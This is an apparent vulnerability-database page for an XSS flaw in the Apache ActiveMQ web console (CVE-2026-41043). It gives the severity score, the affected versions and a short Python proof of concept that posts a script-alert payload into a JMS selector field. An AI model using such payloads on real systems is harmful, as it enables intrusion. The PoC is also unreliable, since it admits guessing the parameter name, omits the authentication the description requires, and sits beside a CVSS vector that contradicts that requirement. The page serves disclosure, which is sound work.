Security Vulnerability Report

CVE-2026-41043

Published: 2026-04-24 11:16:23
Last Modified: 2026-04-27 14:49:25

Description

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache ActiveMQ, Apache ActiveMQ Web. An authenticated attacker can show malicious content when browsing queues in the web console by overriding the content type to be HTML (instead of XML) and by injecting HTML into a JMS selector field. This issue affects Apache ActiveMQ: before 5.19.6, from 6.0.0 before 6.2.5; Apache ActiveMQ Web: before 5.19.6, from 6.0.0 before 6.2.5. Users are recommended to upgrade to version 6.2.5 or 5.19.6, which fixes the issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:apache:activemq_web:*:*:*:*:*:*:*:* - VULNERABLE
Apache ActiveMQ < 5.19.6
Apache ActiveMQ >= 6.0.0, < 6.2.5
Apache ActiveMQ Web < 5.19.6
Apache ActiveMQ Web >= 6.0.0, < 6.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (Example)
target_url = "http://localhost:8161/admin/queues.jsp"

# Malicious Payload to be injected into the JMS selector field
xss_payload = "<script>alert('CVE-2026-41043 XSS');</script>"

# Headers to override the content type
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "text/html",  # Overriding content type to trigger HTML rendering
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
}

# Data payload targeting the JMS selector parameter
# Note: The actual parameter name might vary depending on the specific endpoint implementation
data = {
    "JMSSelector": xss_payload,
    "view": "queues",
}

# Sending the request
try:
    response = requests.post(target_url, headers=headers, data=data, verify=False)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the browser console or queue page for the alert.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://activemq.apache.org/security-advisories.data/CVE-2026-41043-announcement.txt (Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/04/23/5 (Mailing List)

Raw JSON Data
